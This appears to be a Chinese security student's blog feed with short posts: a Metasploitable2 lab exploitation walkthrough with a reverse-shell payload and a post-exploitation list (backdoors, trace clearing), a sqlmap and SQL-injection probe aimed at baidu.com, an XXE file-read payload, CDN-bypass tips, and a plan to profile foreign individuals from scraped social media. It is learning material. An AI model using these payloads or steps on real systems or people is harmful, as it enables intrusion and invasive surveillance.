<content type="html"><![CDATA[<blockquote><p>3sum跟之前的2sum有点像,但难度更大一些</p></blockquote><p><a href="https://leetcode-cn.com/problems/3sum/">leetcode.15</a></p><h3 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述 :"></a>题目描述 :</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.</span><br><span class="line"></span><br><span class="line">Notice that the solution set must not contain duplicate triplets.</span><br></pre></td></tr></table></figure><p>范围<code>0 <= nums.length <= 3000</code></p><h3 id="方法1"><a href="#方法1" class="headerlink" title="方法1:"></a>方法1:</h3><p>枚举所有方法,时间复杂度n^3,会超时</p><h3 id="方法2"><a href="#方法2" class="headerlink" title="方法2:"></a>方法2:</h3><p>排序</p><p>哈希法(2等1)</p><p>循环i,j 此时 t=0-nums[i]-nums[j]</p><p>根据哈希,判断t是否在数组中出现过</p><p><strong>注意:需要去重</strong></p><h3 id="方法3"><a href="#方法3" class="headerlink" title="方法3:"></a>方法3:</h3><p>排序</p><p>双指针(1等2)</p><p>t=0-nums[i]-nums[j]</p><p>思路:</p><p>固定i指针,j,k分别在两端,交替向中间靠拢(比较t)</p><p><strong>注意:去重</strong></p><h3 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Solution</span>:</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">threeSum</span>(<span class="params">self, nums: <span class="type">List</span>[<span class="built_in">int</span>]</span>) -> <span class="type">List</span>[<span class="type">List</span>[<span class="built_in">int</span>]]:</span><br><span class="line"> <span class="comment">#双指针移动</span></span><br><span class="line"> <span class="comment">#i为定指针</span></span><br><span class="line"> <span class="comment">#j,k为移动指针</span></span><br><span class="line"> <span class="comment">#首先要排序</span></span><br><span class="line"> nums.sort() </span><br><span class="line"> lens=<span class="built_in">len</span>(nums)</span><br><span class="line"> </span><br><span class="line"> res=[]</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(lens):</span><br><span class="line"> </span><br><span class="line"> <span class="comment">#要求j,k位置的和</span></span><br><span class="line"> <span class="comment">#对第一个位置要特殊判断</span></span><br><span class="line"> <span class="keyword">if</span> i <span class="keyword">and</span> nums[i]==nums[i-<span class="number">1</span>]:</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> j=i+<span class="number">1</span></span><br><span class="line"> k=lens-<span class="number">1</span></span><br><span class="line"> tmp=<span class="number">0</span>-nums[i]</span><br><span class="line"> <span class="keyword">while</span>(j<k):</span><br><span class="line"> arr=[]</span><br><span class="line"> <span class="keyword">if</span> nums[j]+nums[k]>tmp:</span><br><span class="line"> k=k-<span class="number">1</span></span><br><span class="line"> <span class="keyword">elif</span> nums[j]+nums[k]<tmp:</span><br><span class="line"> j=j+<span class="number">1</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="comment">#添加数组元素的另一种方法:</span></span><br><span class="line"> <span class="comment">#res.append([nums[i],nums[L],nums[R]])</span></span><br><span class="line"> arr.append(nums[i])</span><br><span class="line"> arr.append(nums[j])</span><br><span class="line"> arr.append(nums[k])</span><br><span class="line"> </span><br><span class="line"> res.append(arr)</span><br><span class="line"> <span class="comment">#此处直接去重</span></span><br><span class="line"> <span class="keyword">while</span>((j<k) <span class="keyword">and</span> nums[j]==nums[j+<span class="number">1</span>]):</span><br><span class="line"> j=j+<span class="number">1</span></span><br><span class="line"> <span class="keyword">while</span>((j<k) <span class="keyword">and</span> nums[k]==nums[k-<span class="number">1</span>]):</span><br><span class="line"> k=k-<span class="number">1</span></span><br><span class="line"> k=k-<span class="number">1</span></span><br><span class="line"> j=j+<span class="number">1</span></span><br><span class="line"> <span class="keyword">return</span> res </span><br></pre></td></tr></table></figure><h3 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h3><p>此题题目简单,但是需要考虑的东西也比较细.</p><ul><li>去重</li><li>hash及set的使用</li><li>双指针</li><li>剪枝</li><li>对首位的特殊判断</li></ul>]]></content>
<categories>
<category> 算法 </category>
</categories>
<tags>
<tag> 算法 </tag>
<tag> leetcode </tag>
</tags>
</entry>
<entry>
<title>渗透Metasploitable2</title>
<link href="/2021/03/17/kali/"/>
<url>/2021/03/17/kali/</url>
<content type="html"><![CDATA[<blockquote><p>Metasploitable2是一款很好的渗透测试靶机</p></blockquote><h3 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h3><p>攻击机:kali IP:192.168.211.140</p><p>目标主机:Metasploitable2 IP:192.168.211.132</p><h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p>1.使用命令msfconsole进入msf控制台</p><img src="https://i.loli.net/2021/03/17/xhgMnCZvJ3AlQyw.png" alt="image-20210317192744736" style="zoom:67%;" /><p>2.使用Nmap扫描,查看目标系统开放端口和服务.</p><img src="https://i.loli.net/2021/03/17/rKnzR1EZijmV7aH.png" alt="image-20210317193125963" style="zoom:67%;" /><p>3.根据扫描结果选择合适的exploit和payload</p><p>此次使用Samba3.0存在的漏洞进行攻击</p><p>**提示:**在rank栏选择great/excellent的模块,会有很好效果,成功率更高.</p><img src="https://i.loli.net/2021/03/17/wyxbWKE4mLqVclX.png" alt="image-20210317193350796" style="zoom:67%;" /><p>4.使用攻击模块</p><p>选择exploit/multi/samba/usermap_script</p><p>提示:使用info+模块 查看说明</p><img src="https://i.loli.net/2021/03/17/oZJirFMjk5HC3h6.png" alt="image-20210317194342573" style="zoom:67%;" /><p>show payloads,查看可用攻击载荷.</p><p>5.设置攻击载荷</p><p>set PAYLOAD cmd/unix/reverse</p><p>设置目标机IP及端口</p><p>设置攻击机IP</p><p><strong>注意</strong>:此处的端口号是漏洞服务对应的端口号,在Nmap那一步可以看到.</p><p>show options可以查看payload的配置,Required为不可缺参数</p><img src="https://i.loli.net/2021/03/17/7uTQKxsf6aHDdLp.png" alt="image-20210317195047700" style="zoom:67%;" /><p>6.使用expolit命令进行攻击</p><img src="https://i.loli.net/2021/03/17/T1SDBs5F8KPjOWi.png" alt="image-20210317195453218" style="zoom:67%;" /><p>已成功获取目标主机shell !</p><p>可以使用命令 uname -a 进行验证.</p><h3 id="后续"><a href="#后续" class="headerlink" title="后续"></a>后续</h3><ul><li>进一步获取目标系统信息</li><li>关闭目标系统杀毒软件</li><li>利用已攻陷的主机做为跳板/肉鸡</li><li>后渗透(权限提升、横向提权、纵向提权)</li><li>留下后门</li><li>痕迹清除</li></ul>]]></content>
<categories>
<category> 渗透 </category>
</categories>
<tags>
<tag> 漏洞 </tag>
<tag> 渗透 </tag>
</tags>
</entry>
<entry>
<title>舆情分析-人物画像</title>
<link href="/2021/03/16/NLP/"/>
<url>/2021/03/16/NLP/</url>
<content type="html"><![CDATA[<blockquote><p>最近在做舆情分析的课题,稍微记录一下.</p></blockquote><h3 id="所需技术"><a href="#所需技术" class="headerlink" title="所需技术"></a>所需技术</h3><ul><li>爬虫</li><li>话题分析</li><li>人物画像</li><li>命名实体识别</li><li>意见抽取</li><li>情感分类</li><li>文本分类</li></ul><h3 id="任务"><a href="#任务" class="headerlink" title="任务"></a>任务</h3><p>课题:境外涉华人物画像</p><ul><li><p>数量:不少于100</p></li><li><p>国家/地区:美日澳印、欧洲、东南亚、俄罗斯、港台</p></li><li><p>领域:智库、军情、政治、法律、高科技(人工智能、芯片、通信、电子、材料、太空、航天等)、演艺、人文、知名大学毕业生</p></li><li><p>实时跟踪社交媒体动态(Twitter、Facebook、Line、Linkedin)</p></li><li><p>社交情况及社交指数</p></li><li><p>人格分析:大五人格</p></li><li><p>涉华言论(文本、音视频)、热点话题及其情感极性</p></li><li><p>对华好感指数</p></li></ul><h3 id="预期成果"><a href="#预期成果" class="headerlink" title="预期成果"></a>预期成果</h3><p>实时跟踪twitter, facebook等社交媒体动态,生成境外涉华人物画像。人物涉及多个国家地区,并分析相应人物的社交指数,大五人格,以及对华好感指数等,并对其涉华言论的情感极性进行深入分析。</p><p>通过可视化,建立图形化界面等技术,从公共社交媒体上利用爬虫爬取公开的涉华人物的相关信息动态,完成预期的目标任务,做成一个能够从公开媒体上爬取并分析信息情报的平台雏形,具有相当的实用价值。</p><h3 id="初步模型"><a href="#初步模型" class="headerlink" title="初步模型"></a>初步模型</h3><img src="https://i.loli.net/2021/03/18/uXe1no9hW6JNyDj.png" align="left" alt="未命名文件" style="zoom: 80%;" /><h3 id="实现过程"><a href="#实现过程" class="headerlink" title="实现过程"></a>实现过程</h3><h4 id="数据爬取及处理"><a href="#数据爬取及处理" class="headerlink" title="数据爬取及处理"></a>数据爬取及处理</h4><h4 id="社交指数分析"><a href="#社交指数分析" class="headerlink" title="社交指数分析"></a>社交指数分析</h4><p><img src="https://i.loli.net/2021/03/18/mD2n8yhNLQdfwig.png" alt="image-20210318100300846"></p><p><img src="https://i.loli.net/2021/03/18/Jl8Nrj1uORhQSF9.png" alt="image-20210318100319880"></p><h4 id="涉华言论情感分析"><a href="#涉华言论情感分析" class="headerlink" title="涉华言论情感分析"></a>涉华言论情感分析</h4><h4 id="人格分析"><a href="#人格分析" class="headerlink" title="人格分析"></a>人格分析</h4><p>大五人格</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">开放性(openness)</span><br><span class="line"> 具有想象、审美、情感丰富、求异、创造、智能等特质。</span><br><span class="line">责任心(conscientiousness):</span><br><span class="line"> 显示胜任、公正、条理、尽职、成就、自律、谨慎、克制等特点。</span><br><span class="line">外倾性(extraversion):</span><br><span class="line"> 表现出热情、社交、果断、活跃、冒险、乐观等特质。</span><br><span class="line">宜人性(agreeableness):</span><br><span class="line"> 具有信任、利他、直率、依从、谦虚、移情等特质。</span><br><span class="line">神经质性(neuroticism):</span><br><span class="line"> 难以平衡焦虑、敌对、压抑、自我意识、冲动、脆弱等情绪的特质,即不具有保持情绪稳定的能力。</span><br></pre></td></tr></table></figure><h4 id="对华好感指数"><a href="#对华好感指数" class="headerlink" title="对华好感指数"></a>对华好感指数</h4><p>在不同领域探索对华好感指数</p><p><img src="https://i.loli.net/2021/03/18/5oacYN6hOZgif8w.png" alt="image-20210318100623093"></p><h4 id="热点话题抽取"><a href="#热点话题抽取" class="headerlink" title="热点话题抽取"></a>热点话题抽取</h4><p><img src="https://i.loli.net/2021/03/18/XBmGutHdZTwyj5K.png" alt="image-20210318100532182"></p><p>PS:此项目小组合作完成 , 源代码暂不公开</p>]]></content>
<categories>
<category> blog </category>
</categories>
</entry>
<entry>
<title>V&N-CTF</title>
<link href="/2021/03/14/VN/"/>
<url>/2021/03/14/VN/</url>
<content type="html"><![CDATA[<h3 id="web游戏题"><a href="#web游戏题" class="headerlink" title="web游戏题"></a>web游戏题</h3><p>提示:通关就有flag</p><p>尝试修改start_level,但是无法直接开始第10关</p><p>尝试修改死亡后reset的next_level,然后去送死,按下Esc,就是第二关。</p><p>却发现boss很难打,于是又修改人物参数:血量、飞镖数量等。</p><p><img src="https://i.loli.net/2021/03/14/8WzIQXblDZR3Nng.png" alt="image-20210314235011044"></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">Reset</span>(<span class="params"></span>)</span><br><span class="line">{</span><br><span class="line"> <span class="comment">// load local storage</span></span><br><span class="line"> playerData = <span class="keyword">new</span> <span class="title class_">PlayerData</span>();</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable language_">localStorage</span>.<span class="property">kbap_coins</span>)</span><br><span class="line"> playerData.<span class="property">coins</span> = <span class="built_in">parseInt</span>(<span class="variable language_">localStorage</span>.<span class="property">kbap_coins</span>, <span class="number">10</span>);</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable language_">localStorage</span>.<span class="property">kbap_warp</span>)</span><br><span class="line"> warpLevel = <span class="built_in">parseInt</span>(<span class="variable language_">localStorage</span>.<span class="property">kbap_warp</span>, <span class="number">10</span>);</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable language_">localStorage</span>.<span class="property">kbap_bestTime</span>)</span><br><span class="line"> speedRunBestTime = <span class="built_in">parseInt</span>(<span class="variable language_">localStorage</span>.<span class="property">kbap_bestTime</span>, <span class="number">10</span>);</span><br><span class="line"> nextLevel = <span class="number">10</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><img src="https://i.loli.net/2021/03/14/fcKorsJpBRiPVH3.png" alt="image-20210314235140421"></p><p>打败BOSS,获得flag。</p><p>这游戏挺好玩!</p>]]></content>
<categories>
<category> CTF </category>
</categories>
</entry>
<entry>
<title>云蜜罐</title>
<link href="/2021/03/13/%E8%9C%9C%E7%BD%90/"/>
<url>/2021/03/13/%E8%9C%9C%E7%BD%90/</url>
<content type="html"><![CDATA[<blockquote><p>在公众号上看到一篇云蜜罐的文章,记录一下</p></blockquote><p>参考链接:<a href="https://mp.weixin.qq.com/s?__biz=MjM5NzA3Nzg2MA==&mid=2649850797&idx=1&sn=613b99fb34f8981ac9443751350c162a&chksm=beda55a689addcb0a419a3f125dcc2c10f34f914de3a94d19f29fd41a83884ca7a549629b452&mpshare=1&scene=23&srcid=0310ZUYFGHI200bvmbf8Xeym&sharer_sharetime=1615365828620&sharer_shareid=6667ab5df2c656171aa24aeecfcd6fe5#rd">知道创宇</a></p><p><a href="https://github.com/paralax/awesome-honeypots/blob/master/README_CN.md">优秀蜜罐有哪些</a></p><h3 id="“云蜜罐”是什么?"><a href="#“云蜜罐”是什么?" class="headerlink" title="“云蜜罐”是什么?"></a>“云蜜罐”是什么?</h3><p><strong>无需软硬件,无需云主机,不需占用任何客户资源,云端实现快捷部署,并在域名接入功能上取得了突破</strong>。</p><h3 id="与传统蜜罐有何不同"><a href="#与传统蜜罐有何不同" class="headerlink" title="与传统蜜罐有何不同"></a>与传统蜜罐有何不同</h3><p>与传统蜜罐相比,“云蜜罐”除去部署方式上的不同,还有一大优势在于云端部署<strong>不需占用任何客户端资源,不会对现有的业务造成任何影响</strong>。同时,云端“一键部署”快捷安全,尤其适用于网站防御方面。在即将到来的网络攻防实战演练中,防守方一旦发现预先进行了网络防护的网站有被攻击迹象,比起被动挨打,还可以选择<strong>通过快捷部署“云蜜罐”作为一种紧急应对方式,感知攻击威胁、记录攻击痕迹、争取溯源反制</strong>。</p><h3 id="用法"><a href="#用法" class="headerlink" title="用法"></a>用法</h3><p><strong>为域名暴破攻击提供“定制陷阱”的服务</strong>。</p><p><strong>“云蜜罐”智能子域名推荐系统会根据录入的根域名,自动生成高敏感子域名,在攻击者使用子域名暴破攻击的必经之路上设置陷阱,提高攻击捕获可能性</strong>,在一定程度上减轻真实资产的流量压力以及防止黑客进一步入侵。</p>]]></content>
<categories>
<category> 安全 </category>
</categories>
</entry>
<entry>
<title>关于WAF</title>
<link href="/2021/03/12/WAF/"/>
<url>/2021/03/12/WAF/</url>
<content type="html"><![CDATA[<h3 id="定义"><a href="#定义" class="headerlink" title="定义"></a>定义</h3><p>Web应用防火墙(Web Applocation Firewall)</p><p>通过一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的产品</p><h3 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h3><ul><li>软件型</li><li>硬件型</li><li>云WAF(反向代理 ,类似于带防护功能的CDN)</li><li>网站系统内置的WAF</li></ul><h3 id="WAF-的判断"><a href="#WAF-的判断" class="headerlink" title="WAF 的判断"></a>WAF 的判断</h3><p>1.sqlmap</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "https://baidu.com --identify-waf --batch"</span><br></pre></td></tr></table></figure><p>2.手工判断</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?test=1 union select 1,2,3%23</span><br></pre></td></tr></table></figure><p>选取不存在的参数,如果被拦截:</p><ul><li>页面无法访问</li><li>响应码不同</li><li>返回与正常请求网页不同时的结果</li></ul><h3 id="WAF-by-pass"><a href="#WAF-by-pass" class="headerlink" title="WAF by pass"></a>WAF by pass</h3><p>参考我的另一篇博客</p><p><a href="https://h4m5t.top/%E5%AE%89%E5%85%A8/2021/02/11/WAF.html">WAF by pass 技巧</a></p><p>另外加几个技巧</p><ul><li>多参数请求拆分</li><li>HTTP参数污染(同一参数出现多次,不同的中间件解析为不同的结果)</li><li>使用生僻函数</li></ul>]]></content>
<categories>
<category> 安全 </category>
</categories>
</entry>
<entry>
<title>XXE漏洞</title>
<link href="/2021/03/12/XXE/"/>
<url>/2021/03/12/XXE/</url>
<content type="html"><![CDATA[<h3 id="定义"><a href="#定义" class="headerlink" title="定义"></a>定义</h3><p>外部实体注入(XML External Entity XML)。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。</p><h3 id="XXE的利用"><a href="#XXE的利用" class="headerlink" title="XXE的利用"></a>XXE的利用</h3><ul><li>读取本地敏感文件</li><li>内网主机探测</li><li>主机端口探测</li><li>盲注</li><li>文件上传</li><li>钓鱼</li></ul><h3 id="文章参考"><a href="#文章参考" class="headerlink" title="文章参考"></a>文章参考</h3><p>先知社区有一篇关于XXE的文章:</p><p><a href="https://xz.aliyun.com/t/3357#toc-17">XXE漏洞及利用</a></p><img src="https://i.loli.net/2021/03/12/LJMZdOSA71DbTB8.png" alt="img" style="zoom: 67%;" /><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?xml version=<span class="string">"1.0"</span> encoding=<span class="string">"utf-8"</span>?></span> </span><br><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">updateProfile</span> [<span class="meta"><!ENTITY <span class="keyword">file</span> <span class="keyword">SYSTEM</span> <span class="string">"file:///c:/windows/win.ini"</span>></span> ]></span> </span><br><span class="line"><span class="tag"><<span class="name">updateProfile</span>></span> </span><br><span class="line"> <span class="tag"><<span class="name">firstname</span>></span>Joe<span class="tag"></<span class="name">firstname</span>></span> </span><br><span class="line"> <span class="tag"><<span class="name">lastname</span>></span><span class="symbol">&file;</span><span class="tag"></<span class="name">lastname</span>></span> </span><br><span class="line"> ... </span><br><span class="line"><span class="tag"></<span class="name">updateProfile</span>></span></span><br></pre></td></tr></table></figure><h3 id="防护"><a href="#防护" class="headerlink" title="防护"></a>防护</h3><ul><li>禁止引用外部实体</li><li>过滤用户提交的XML数据</li></ul>]]></content>
<categories>
<category> 漏洞 </category>
</categories>
</entry>
<entry>
<title>字节跳动安全风控训练营总结</title>
<link href="/2021/03/11/%E5%AD%97%E8%8A%82/"/>
<url>/2021/03/11/%E5%AD%97%E8%8A%82/</url>
<content type="html"><![CDATA[<blockquote><p>寒假期间参加了字节安全训练营,算是有很多收获吧。学到了一些安全知识,认识了一些小伙伴,都是名牌大学的本科、硕士生。给人的印象是字节的安全工程师比较务实,很有水平。上一节课比在学校上一学期更有用。更加坚定了我去企业的想法。也感觉学术界的安全研究和企业脱节比较严重,在这个工业界引领发展,反哺学术界的时代,或许在企业能学到更多东西吧。</p></blockquote><h3 id="先放上证书纪念一下"><a href="#先放上证书纪念一下" class="headerlink" title="先放上证书纪念一下"></a>先放上证书纪念一下</h3><img src="https://i.loli.net/2021/03/10/vFdy6lhixMfsA1K.png" alt="image-20210310185934547" style="zoom: 50%;" /><h3 id="课程内容"><a href="#课程内容" class="headerlink" title="课程内容"></a>课程内容</h3><ul><li>web安全概述</li><li>渗透测试进阶</li><li>WAF建设</li><li>安全系统架构设计</li></ul><h3 id="小组任务"><a href="#小组任务" class="headerlink" title="小组任务"></a>小组任务</h3><p>官方提供一台云主机,以Dockers镜像的方式预置一个Web漏洞靶场。</p><ul><li>对靶场进行渗透测试,发现存在的安全问题。</li><li>研发/搭建Web应用防火墙(WAF),对已存在的安全问题进行有效防护。</li><li>搭建WAF管理后台,实现对WAF规则配置和日志查询。</li></ul><h3 id="WAF研发"><a href="#WAF研发" class="headerlink" title="WAF研发"></a>WAF研发</h3><ul><li>解码能力(常用编码、混合编码、多重编码)</li><li>字符串匹配(单模式、多模式)</li><li>正则表达式引擎(hyperscan)</li><li>规则提取和优化(根据漏洞、payload、平衡漏报与误报)</li><li>开源规则集(OWASP® ModSecurity Core Rule Set (CRS))</li><li>接口频率限制(限频算法、资源限频、用户限制频)</li><li>业务基线自学习</li><li>BOT检测(人机识别、行为检测)</li></ul><h3 id="寻找漏洞"><a href="#寻找漏洞" class="headerlink" title="寻找漏洞"></a>寻找漏洞</h3><ul><li>用户登陆接口有SQL注入</li><li>本地文件包含(路径爆破)</li><li>水平垂直越权(修改cookie中student_id,可以获取其他人信息)</li><li>服务端请求伪造(SSRF)(头像链接)</li><li>敏感信息泄露(爆破目录,有身份证号)</li><li>暴力破解</li><li>其他<ul><li>Cookie存活时间太长</li><li>httpOnly属性没有开启</li><li>Secure没有开启</li><li>不安全的存储方案(md5存密码,容易被破解)</li><li>HTTP头部属性缺失(CSP)</li></ul></li></ul>]]></content>
<categories>
<category> blog </category>
</categories>
</entry>
<entry>
<title>Python命令行解析Argparse</title>
<link href="/2021/03/10/%E5%8F%82%E6%95%B0/"/>
<url>/2021/03/10/%E5%8F%82%E6%95%B0/</url>
<content type="html"><![CDATA[<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line">parser = argparse.ArgumentParser()</span><br><span class="line">parser.parse_args()</span><br></pre></td></tr></table></figure><p><code>argparse</code>模块还会自动生成帮助和使用消息,并在用户为程序提供无效参数时发出错误。</p><p><code>default</code>:没有设置值情况下的默认参数</p><p><code>required:</code> 表示这个参数是否一定需要设置</p><p><code>type</code>:参数类型</p><p>默认的参数类型是str类型,如果你的程序需要一个整数或者布尔型参数,你需要设置<code>type=int</code>或<code>type=bool</code></p><p><code>choices</code>:参数值只能从几个选项里面选择</p><p><code>help</code>:指定参数的说明信息</p><p><code>dest</code>:设置参数在代码中的变量名</p><p>argparse默认的变量名是<code>--</code>或<code>-</code>后面的字符串,但是你也可以通过<code>dest=xxx</code>来设置参数的变量名,然后在代码中用<code>args.xxx</code>来获取参数的值。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line"></span><br><span class="line">parser = argparse.ArgumentParser()</span><br><span class="line"></span><br><span class="line">parser.add_argument(<span class="string">"--square"</span>, <span class="built_in">help</span>=<span class="string">"display a square of a given number"</span>, <span class="built_in">type</span>=<span class="built_in">int</span>)</span><br><span class="line">parser.add_argument(<span class="string">"--cubic"</span>, <span class="built_in">help</span>=<span class="string">"display a cubic of a given number"</span>, <span class="built_in">type</span>=<span class="built_in">int</span>)</span><br><span class="line"></span><br><span class="line">args = parser.parse_args()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> args.square:</span><br><span class="line"> <span class="built_in">print</span> args.square**<span class="number">2</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> args.cubic:</span><br><span class="line"> <span class="built_in">print</span> args.cubic**<span class="number">3</span></span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> blog </category>
</categories>
</entry>
<entry>
<title>CDN的绕过</title>
<link href="/2021/03/09/CDN/"/>
<url>/2021/03/09/CDN/</url>
<content type="html"><![CDATA[<blockquote><p>CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。</p></blockquote><p>第一步,判断目标网站是否使用CDN服务.</p><p><img src="https://i.loli.net/2021/02/21/5WotaMguZxOL7Rv.png" alt="img"></p><ul><li>通过ping,查看域名解析情况</li><li>全国多地ping服务,对比每个地区的结果是否一致,如果都是一样的,说明不存在CDN.</li></ul><p>第二步,绕过CDN寻找真实IP</p><p><img src="https://i.loli.net/2021/02/21/tex7XNCMAO2fSuQ.png" alt="image-20210221100509778"></p><ul><li>扫描网站测试文件</li><li>子域名所在IP段</li><li>国外访问</li><li>查询域名历史解析记录</li><li>不同DNS域名解析(nslookup <a href="http://www.example.com/">www.example.com</a> 8.8.8.8)</li><li>敏感文件泄露</li><li>邮箱反弹IP地址</li><li>APP抓包</li></ul><p><img src="https://i.loli.net/2021/03/09/bZQCNBcoJIOr1jL.png" alt="image-20210309201255404"></p>]]></content>
<categories>
<category> 渗透 </category>
</categories>
</entry>